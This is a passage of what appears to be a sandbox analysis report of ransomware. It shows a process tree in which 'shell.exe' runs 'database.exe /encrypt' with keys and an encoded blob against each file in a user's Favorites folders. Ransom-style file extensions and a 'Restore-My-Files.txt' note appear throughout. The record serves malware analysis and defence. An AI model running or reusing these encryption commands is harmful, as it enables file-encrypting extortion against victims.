                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Suggested Sites.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Web Slice Gallery.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\GobiernoUSA.gov.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4460
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:3696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links for United States\USA.gov.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:6920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\IE Add-on site.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Home.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5772
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft At Work.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3672
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Microsoft Store.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Money.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Sports.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
